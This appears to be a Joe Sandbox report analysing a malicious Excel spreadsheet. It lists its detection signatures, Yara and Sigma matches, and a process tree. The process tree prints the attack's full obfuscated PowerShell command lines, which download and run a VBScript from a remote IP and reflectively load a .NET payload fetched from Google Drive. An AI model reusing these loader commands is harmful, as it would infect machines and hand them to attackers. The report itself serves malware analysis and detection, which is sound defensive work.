Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A & C Metrology OC 5457144.xls

Overview

General Information

Sample name:A & C Metrology OC 5457144.xls
Analysis ID:1540833
MD5:48c40411ba277f1c9829871605366dc0
SHA1:8e2a93e0bd4e23b655de720b5d75f1e01420c17e
SHA256:86e985895fb6d155d4d6c894c8d038b76f5e6db694ca0c59867ee43867d49f61
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3404 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3688 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3772 cmdline: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3980 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3988 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 4080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • mshta.exe (PID: 1884 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1040 cmdline: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 1208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 1132 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3584 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 204JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 204INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x3d58:$b2: ::FromBase64String(
    • 0x55f0:$b2: ::FromBase64String(
    • 0x5a8c:$b2: ::FromBase64String(
    • 0x2c71:$b3: ::UTF8.GetString(
    • 0x3b21:$b3: ::UTF8.GetString(
    • 0x53ed:$b3: ::UTF8.GetString(
    • 0x5893:$b3: ::UTF8.GetString(
    • 0x1d73d:$b3: ::UTF8.GetString(
    • 0x1ddb9:$b3: ::UTF8.GetString(
    • 0x449d4:$b3: ::UTF8.GetString(
    • 0x4501c:$b3: ::UTF8.GetString(
    • 0x4aa77:$b3: ::UTF8.GetString(
    • 0x4b264:$b3: ::UTF8.GetString(
    • 0x4b8e9:$b3: ::UTF8.GetString(
    • 0x62b72:$b3: ::UTF8.GetString(
    • 0x6bf4b:$b3: ::UTF8.GetString(
    • 0x70604:$b3: ::UTF8.GetString(
    • 0x70c7f:$b3: ::UTF8.GetString(
    • 0x71e1a:$b3: ::UTF8.GetString(
    • 0x766d4:$b3: ::UTF8.GetString(
    • 0x76d4e:$b3: ::UTF8.GetString(
    Process Memory Space: powershell.exe PID: 3900JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 3900INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x4809e:$b2: ::FromBase64String(
      • 0x49928:$b2: ::FromBase64String(
      • 0x49dc4:$b2: ::FromBase64String(
      • 0x496d:$b3: ::UTF8.GetString(
      • 0x4fe7:$b3: ::UTF8.GetString(
      • 0xab35:$b3: ::UTF8.GetString(
      • 0xb1b0:$b3: ::UTF8.GetString(
      • 0xc27d:$b3: ::UTF8.GetString(
      • 0xfa72:$b3: ::UTF8.GetString(
      • 0x10259:$b3: ::UTF8.GetString(
      • 0x397a0:$b3: ::UTF8.GetString(
      • 0x39e4f:$b3: ::UTF8.GetString(
      • 0x46fd0:$b3: ::UTF8.GetString(
      • 0x47e67:$b3: ::UTF8.GetString(
      • 0x49725:$b3: ::UTF8.GetString(
      • 0x49bcb:$b3: ::UTF8.GetString(
      • 0x611ab:$b3: ::UTF8.GetString(
      • 0x69793:$b3: ::UTF8.GetString(
      • 0x3b4a:$s1: -join
      • 0x4862:$s1: -join
      • 0x4b52:$s1: -join

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Base64 Encoded PowerShell Command Detected
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtL